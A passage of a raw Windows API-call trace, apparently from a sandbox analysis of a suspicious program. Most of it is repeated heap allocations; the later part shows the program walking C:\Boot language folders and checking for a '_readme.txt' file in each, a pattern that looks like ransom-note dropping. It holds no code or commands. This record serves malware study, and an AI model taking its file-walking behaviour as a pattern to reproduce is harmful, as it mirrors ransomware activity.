dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.566] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.566] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.567] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.567] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.568] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.568] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.569] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.569] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.570] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.570] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.570] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.570] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.570] PathFindFileNameW (pszPath="") returned="" [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.570] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.570] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.570] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.570] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.570] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0146.570] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.570] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0146.571] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.572] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.572] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.572] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.572] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.572] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.572] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.572] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.572] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.572] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0146.572] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.572] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.572] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.572] PathFindFileNameW (pszPath="") returned="" [0146.572] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.572] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.573] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.573] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.573] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.573] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.573] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.573] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.573] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0146.573] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.573] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0146.574] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.574] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.574] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.574] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.574] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.574] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.574] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.574] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.574] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.574] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0146.574] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.575] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.575] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.575] PathFindFileNameW (pszPath="") returned="" [0146.575] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.575] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.575] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.575] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.575] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.575] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.575] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.575] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.575] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0146.575] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.575] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0146.576] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.577] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, 